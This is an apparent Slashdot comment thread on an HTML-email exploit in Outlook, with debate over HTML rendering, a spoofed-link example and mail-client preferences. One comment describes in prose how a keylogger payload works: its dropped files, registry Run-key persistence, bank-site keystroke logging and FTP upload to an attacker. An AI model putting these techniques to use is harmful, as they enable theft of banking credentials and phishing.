Given all that why exactly was the execution of code added to email? There must have been a decission made at MS at sometime but anyone ever see the reasons for it?

Oh and don't get me wrong. I hate html formatted emails since they are pain to read on remote shell. Sadly I am a linux geek and everyone else seems to disagree. No other slashdotters do not matter, you are geeks too.

Re:Sigh scare mongerer.

[turnstyle]

"Repeat after me. HTML RENDERING IS NOT HARMFULL."

No, you are wrong.

A very simple example is an HREF that seems to be pointing to a trustworthy site, but really points elsewhere.

In fact, Slashdot specifically includes defenses against such simple tricks.

For example, http://www.TrustworthySite.com.

In a plain text reader, it would be obvious that really links to http://www.NastyEvilDoer.com

HTML email

[phorm]

A lot of people are blaming this on allowing HTML in email, but the fact is that HTML is a *STATIC* language... it can't - or at least shouldn't be able to - hurt your PC.

Now, by either having a parse exploit with the HTML (bad client coding), or allowing scripts (really poor security) then problems arise...

Personally, I dumped Outlook a loooong time ago. Thunderbird is nice and not hard for most users to switch to, my primary beef is that it doesn't seem to have an option to block images but allow by sender/site - or to allow a particular message to be clicked to show images (some catalogues I get via subscription in my email have images I want to see)

Payload

[Bob+Ince]

I'm amazed that no-one has yet posted an analysis of the final payload 'a.exe'.

This decompresses and drops 'ra32.exe', 'lanext.dll' and 'lanman.dll' into the Application Data\Microsoft folder, and sets ra32.exe to run on startup through a HKCU\Software\MS\Win\CV\Run registry entry.

These files act as a keylogger. When they sees one of a built-in list of online bank sites being used, it logs keypresses for a bit and uploads the result via FTP to a server controlled by the attacker.

Bizarrely, for me in Windows 2000, it also opens an alert box with the message 'timediff' every 60 seconds. Bug?

Re:Use Mozilla.

[FluffyOne]

It does. See here:

http://bugzilla.mozilla.org/show_bug.cgi?id=44863# c66

Unfortunately, there's no UI for this functionality yet.

Ronny